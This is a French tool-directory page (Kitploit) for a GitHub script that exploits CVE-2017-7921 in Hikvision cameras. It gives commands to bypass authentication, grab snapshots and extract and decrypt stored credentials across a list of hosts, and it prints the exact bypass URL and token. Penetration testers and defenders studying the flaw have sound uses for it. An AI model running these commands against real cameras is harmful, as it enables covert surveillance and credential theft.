Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-7921 — Contournement d'authentification HikVision CVE, l'outil est capable d'extraire les identifiants et de prendre des instantanés basés sur un magic cookie ou des identifiants fournis. | Kitploit
Outils/GitHubGitHub/mverschu/cve-2017-7921
ReconnaissanceSécurité IoTAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsAuthentification
GitHubmverschu/cve-2017-7921

CVE-2017-7921

Contournement d'authentification HikVision CVE, l'outil est capable d'extraire les identifiants et de prendre des instantanés basés sur un magic cookie ou des identifiants fournis.

1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

Outil de listage et de capture d'écran de caméras Hikvision

Outil autonome pour lister les caméras Hikvision à partir d'un fichier et prendre un instantané de chacune d'elles en utilisant des identifiants valides (authentification HTTP Basic ou Digest) ou le contournement d'authentification CVE. Conçu pour être exécuté sur un autre hôte à des fins de test.

Fonctionnalités

  • Lister les caméras à partir d'un fichier texte (une hôte ou hôte:port par ligne).
  • Vérification (CVE) – tester chaque caméra pour le contournement d'authentification magique CVE (aucun identifiant) ; option --save-snapshot pour les appareils vulnérables.
  • Informations d'identification – extraire l'utilisateur/mot de passe de chaque caméra via la CVE (authentification magique + déchiffrement de la configuration). Nécessite OpenSSL.
  • Vérification d'authentification – vérifier que l'utilisateur/mot de passe sont acceptés par chaque caméra (aucun instantané sauvegardé).
  • Instantané de toutes les caméras – récupère une image par caméra (identifiants valides, ou --exploit pour utiliser le contournement CVE sans identifiants).
  • Requêtes simultanées (workers configurables).
  • Authentification Digest HTTP optionnelle ; --merge optionnel pour construire une image d'ensemble. Dépendances : requests, Pillow (pour --merge).

Prérequis

  • Python 3.8+
  • requests

Installation

root@kitploit:~
pip install -r requirements.txt

Fichier de liste de caméras

Créez un fichier texte avec une caméra par ligne. Les commentaires avec # sont ignorés.

root@kitploit:~
# exemple cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

Utilisation

Lister les caméras

Affiche les caméras lues depuis le fichier (aucun identifiant nécessaire).

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

Vérification optionnelle de l'accessibilité (GET HTTP vers chaque hôte) :

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

Vérification (CVE)

Teste chaque caméra pour la CVE de contournement d'authentification d'instantané Hikvision. Aucun identifiant requis.

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

Sauvegarde les instantanés uniquement pour les caméras vulnérables :

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

Options : --timeout, --workers, -o (pour --save-snapshot).

Informations d'identification (extraction)

Extrait les identifiants de chaque caméra via la CVE (authentification magique pour récupérer la liste des utilisateurs et le fichier de configuration, puis déchiffrement de la configuration). Nécessite OpenSSL sur l'hôte. Aucun identifiant nécessaire pour l'exécution.

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

Options : --timeout, --workers.

Vérification d'authentification

Vérifie que vos identifiants fonctionnent sur chaque caméra (utilise les mêmes points de terminaison d'instantané ; ne sauvegarde pas d'images).

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p VotreMotDePasse

Options : --timeout, --workers, --digest (identique à l'instantané).

Instantané de toutes les caméras

Prend un instantané par caméra et le sauvegarde au format JPEG. Utilisez soit des identifiants valides soit --exploit (contournement d'authentification CVE, sans identifiants).

root@kitploit:~
# Avec identifiants
python hikvision_snapshots.py cameras.txt snapshot -u admin -p VotreMotDePasse

# Avec l'exploit CVE (aucun identifiant)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • Les instantanés sont sauvegardés dans snapshots/ par défaut (utilisez -o pour changer).
  • Les noms de fichiers sont dérivés de hôte ou hôte_port (ex. 192_168_1_100.jpg, nvr_local_8080.jpg).

Options :

Avec --merge, après avoir sauvegardé chaque instantané, l'outil construit une image de grille unique (overview.jpg) dans le répertoire de sortie avec une cellule par caméra et une étiquette. Nécessite Pillow (pip install Pillow).

Exemple avec sortie personnalisée et authentification Digest :

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

Exemple avec vue d'ensemble fusionnée :

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p VotreMotDePasse --merge
# ou avec exploit (sans identifiants) :
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

Points de terminaison

Instantané authentifié (avec identifiants) : le script essaie dans l'ordre – /ISAPI/Streaming/channels/1/picture, /ISAPI/Streaming/channels/101/picture, /onvif-http/snapshot.

CVE (vérification / --exploit) : /onvif-http/snapshot?auth=YWRtaW46MTEK (contournement d'authentification magique, sans identifiants).

Exécution sur un autre hôte

  1. Copiez hikvision_snapshots.py, requirements.txt et votre fichier de liste de caméras sur l'hôte.
  2. Installez : pip install -r requirements.txt
  3. Exécutez list pour vérifier le fichier ; utilisez check pour la CVE, auth-check pour les identifiants, ou snapshot (avec -u/-p ou --exploit).

Assurez-vous que l'hôte a un accès réseau à toutes les adresses IP et ports des caméras.

Télécharger l’outil
OptionDescriptionPar défaut
-u, --usernameNom d'utilisateur de la camérarequis sauf si --exploit
-p, --passwordMot de passe de la camérarequis sauf si --exploit
--exploitUtiliser le contournement d'authentification magique CVE (sans identifiants)désactivé
-o, --output-dirRépertoire pour les images d'instantanésnapshots
--timeoutDélai d'attente HTTP en secondes15
--workersNombre de requêtes d'instantané simultanées10
--digestUtiliser l'authentification Digest HTTP au lieu de Basicdésactivé
--mergeFusionner tous les instantanés en une seule image d'ensembledésactivé
--merge-columnsColonnes de la grille pour la fusion (par défaut : auto)auto